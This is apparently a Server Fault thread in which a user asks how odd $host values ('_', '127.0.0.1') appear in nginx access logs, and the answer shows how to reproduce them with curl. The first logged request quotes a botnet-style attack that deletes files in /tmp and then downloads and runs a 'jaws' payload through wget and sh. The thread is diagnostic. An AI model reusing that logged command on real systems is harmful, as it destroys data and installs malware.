0
222.187.223.158 - - [17/Feb/2022:15:41:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1" 444 0 "-" "Hello, world" "http://127.0.0.1"

167.248.133.47 - - [17/Feb/2022:15:45:11 +0000] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xEF\xC512\xE3\xA4\x1D\xEF\xC4}bA!\x18\x08\xBC\x82X7\x12wuv\x1DD\x00\x8FYJ\xF8\xA6\x0E \x86N\xD1\xBB2z\xC7\xF5i\x96\xE6\xF5\xDB\xE3\x1F\xD5\x5C\xB1\x7F\xE8\xB2YU\xF7\x1B\xC0\xDF\xAB\x87w`?\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0" 400 150 "-" "-" "http://_"

I have these entries in my nginx access.log. In addition I added "$scheme://$host" "$server_port" "$request_body_file" to the log_format.

My question is regarding how the $host can be set to this "_" and this "127.0.0.1" and still work?

If you understand how this happens please could you tell me how to recreate it.

Paul
  • 2,755
  • 6
  • 24
  • 35
andygozindy
  • 11
  • 3
  • These requests are basically the background noise of the web. To be completely compliant with HTTP RFC, it seems your server [should respond](https://serverfault.com/questions/1089218/is-there-a-technical-requirement-to-serve-404-responses). – Paul Feb 18 '22 at 14:14

1 Answers1

1

Sorry, the answer is very simple:

curl -H "Host: anything" https://domain

EDIT Also, for anyone mystified how these entries end up in your nginx logs, try this: curl https://example.com:80

andygozindy
  • 11
  • 3
  • Depending on your use case, you may want to `curl` using [`--connect-to`](https://serverfault.com/a/900860/153188). – Paul Feb 18 '22 at 14:14